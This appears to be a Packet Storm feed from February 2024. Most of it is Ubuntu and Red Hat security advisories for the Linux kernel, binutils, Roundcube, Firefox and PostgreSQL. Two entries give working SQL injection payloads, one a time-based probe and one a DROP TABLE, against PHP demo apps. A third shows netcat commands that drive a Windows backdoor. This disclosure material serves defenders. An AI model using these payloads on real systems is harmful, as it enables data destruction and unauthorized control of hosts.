Flashcard Quiz App version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Flashcard Quiz App - SQL Injection# Google Dork: N/A# Application: Flashcard Quiz App# Date: 25.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.## Proof of Concept (PoC):This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.1. Original Code:$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";2. Payload:' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --3. Injected Query:DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --Request Response foto: https://i.imgur.com/5IXvpiZ.png## Vulnerable code section:====================================================endpoint/delete-flashcard.php$card = $_GET['card'];$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

Flashcard Quiz App 1.0 SQL Injection

Ubuntu Security Notice 6651-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6651-1February 23, 2024linux, linux-aws, linux-gcp, linux-hwe-6.5, linux-laptop, linux-oracle,linux-raspi, linux-starfive vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-laptop: Linux kernel for Lenovo X13s ARM laptops- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-starfive: Linux kernel for StarFive processors- linux-hwe-6.5: Linux hardware enablement (HWE) kernelDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-6915)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Jann Horn discovered that the io_uring subsystem in the Linux kernel didnot properly handle the release of certain buffer rings. A local attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2024-0582)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   linux-image-6.5.0-1008-starfive  6.5.0-1008.9   linux-image-6.5.0-1010-laptop   6.5.0-1010.13   linux-image-6.5.0-1011-raspi    6.5.0-1011.14   linux-image-6.5.0-1014-aws      6.5.0-1014.14   linux-image-6.5.0-1014-gcp      6.5.0-1014.14   linux-image-6.5.0-1016-oracle   6.5.0-1016.16   linux-image-6.5.0-21-generic    6.5.0-21.21   linux-image-6.5.0-21-generic-64k  6.5.0-21.21   linux-image-aws                 6.5.0.1014.14   linux-image-gcp                 6.5.0.1014.14   linux-image-generic             6.5.0.21.20   linux-image-generic-64k         6.5.0.21.20   linux-image-generic-lpae        6.5.0.21.20   linux-image-kvm                 6.5.0.21.20   linux-image-laptop-23.10        6.5.0.1010.13   linux-image-oracle              6.5.0.1016.16   linux-image-raspi               6.5.0.1011.12   linux-image-raspi-nolpae        6.5.0.1011.12   linux-image-starfive            6.5.0.1008.10   linux-image-virtual             6.5.0.21.20Ubuntu 22.04 LTS:   linux-image-6.5.0-21-generic    6.5.0-21.21~22.04.1   linux-image-6.5.0-21-generic-64k  6.5.0-21.21~22.04.1   linux-image-generic-64k-hwe-22.04  6.5.0.21.21~22.04.11   linux-image-generic-hwe-22.04   6.5.0.21.21~22.04.11   linux-image-virtual-hwe-22.04   6.5.0.21.21~22.04.11After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6651-1   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,   CVE-2024-0582, CVE-2024-0646Package Information:   https://launchpad.net/ubuntu/+source/linux/6.5.0-21.21   https://launchpad.net/ubuntu/+source/linux-aws/6.5.0-1014.14   https://launchpad.net/ubuntu/+source/linux-gcp/6.5.0-1014.14   https://launchpad.net/ubuntu/+source/linux-laptop/6.5.0-1010.13   https://launchpad.net/ubuntu/+source/linux-oracle/6.5.0-1016.16   https://launchpad.net/ubuntu/+source/linux-raspi/6.5.0-1011.14   https://launchpad.net/ubuntu/+source/linux-starfive/6.5.0-1008.9   https://launchpad.net/ubuntu/+source/linux-hwe-6.5/6.5.0-21.21~22.04.1

Ubuntu Security Notice USN-6651-1

Ubuntu Security Notice 6650-1 - Zhenghan Wang discovered that the generic ID allocator implementation in the Linux kernel did not properly check for null bitmap when releasing IDs. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6650-1February 23, 2024inux-oem-6.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash under certain conditions.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1034-oem      6.1.0-1034.34   linux-image-oem-22.04           6.1.0.1034.35   linux-image-oem-22.04a          6.1.0.1034.35   linux-image-oem-22.04b          6.1.0.1034.35   linux-image-oem-22.04c          6.1.0.1034.35After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6650-1   CVE-2023-6915Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1034.34

Ubuntu Security Notice USN-6650-1

FAQ Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: FAQ Management System - SQL Injection  
# Google Dork: N/A  
# Application: FAQ Management System  
# Date: 25.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.

## Proof of Concept (PoC):

An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:

1. Original Request:  
http://example.com/endpoint/delete-faq.php?faq=123

2.Malicious Request (SQL Injection):  
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --

This would result in a query like:

DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --

Which can lead to the deletion of data or even the entire table.

poc foto: https://i.imgur.com/1IENYFg.png

## Vulnerable code section:  
====================================================  
endpoint/delete-faq.php

$faq = $_GET['faq'];

// ...

$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";

FAQ Management System 1.0 SQL Injection

Ubuntu Security Notice 6655-1 - It was discovered that GNU binutils was not properly handling the logic behind certain memory management related operations, which could lead to an invalid memory access. An attacker could possibly use this issue to cause a denial of service. It was discovered that GNU binutils was not properly performing bounds checks when dealing with memory allocation operations, which could lead to excessive memory consumption. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6655-1February 26, 2024binutils vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in GNU binutils.Software Description:- binutils: GNU assembler, linker and binary utilitiesDetails:It was discovered that GNU binutils was not properly handling the logicbehind certain memory management related operations, which could lead toan invalid memory access. An attacker could possibly use this issue tocause a denial of service. (CVE-2022-47695)It was discovered that GNU binutils was not properly performing boundschecks when dealing with memory allocation operations, which could leadto excessive memory consumption. An attacker could possibly use this issueto cause a denial of service. (CVE-2022-48063)It was discovered that GNU binutils incorrectly handled memory managementoperations in several of its functions, which could lead to excessivememory consumption due to memory leaks. An attacker could possibly usethese issues to cause a denial of service. (CVE-2022-48065)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   binutils                        2.38-4ubuntu2.6   binutils-multiarch              2.38-4ubuntu2.6Ubuntu 20.04 LTS:   binutils                        2.34-6ubuntu1.9   binutils-multiarch              2.34-6ubuntu1.9In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6655-1   CVE-2022-47695, CVE-2022-48063, CVE-2022-48065Package Information:   https://launchpad.net/ubuntu/+source/binutils/2.38-4ubuntu2.6   https://launchpad.net/ubuntu/+source/binutils/2.34-6ubuntu1.9

Ubuntu Security Notice USN-6655-1

Ubuntu Security Notice 6654-1 - It was discovered that Roundcube Webmail incorrectly sanitized characters in the linkrefs text messages. An attacker could possibly use this issue to execute a cross-site scripting attack.

==========================================================================  
Ubuntu Security Notice USN-6654-1  
February 26, 2024

roundcube vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Roundcube Webmail could allow cross-site scripting (XSS) attacks.

Software Description:  
- roundcube: skinnable AJAX based webmail solution for IMAP servers

Details:

It was discovered that Roundcube Webmail incorrectly sanitized characters  
in the linkrefs text messages. An attacker could possibly use this issue to  
execute a cross-site scripting (XSS) attack. (CVE-2023-43770)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  roundcube                       1.6.2+dfsg-1ubuntu0.1  
  roundcube-core                  1.6.2+dfsg-1ubuntu0.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.5.0+dfsg.1-2ubuntu0.1~esm2  
  roundcube-core                  1.5.0+dfsg.1-2ubuntu0.1~esm2

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.4.3+dfsg.1-1ubuntu0.1~esm3  
  roundcube-core                  1.4.3+dfsg.1-1ubuntu0.1~esm3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.3.6+dfsg.1-1ubuntu0.1~esm3  
  roundcube-core                  1.3.6+dfsg.1-1ubuntu0.1~esm3

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  roundcube                       1.2~beta+dfsg.1-0ubuntu1+esm3  
  roundcube-core                  1.2~beta+dfsg.1-0ubuntu1+esm3

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6654-1  
  CVE-2023-43770

Package Information:  
  https://launchpad.net/ubuntu/+source/roundcube/1.6.2+dfsg-1ubuntu0.1

Ubuntu Security Notice USN-6654-1

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Red Hat Security Advisory 2024-0976-03 - An update for firefox is now available for Red Hat Enterprise Linux 7. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0976.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0976-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0976  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0976-03

Red Hat Security Advisory 2024-0975-03 - An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0975.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:13 security updateAdvisory ID:        RHSA-2024:0975-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0975Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:13 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0975-03

Red Hat Security Advisory 2024-0974-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0974.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:12 security updateAdvisory ID:        RHSA-2024:0974-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0974Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Source

Packet Storm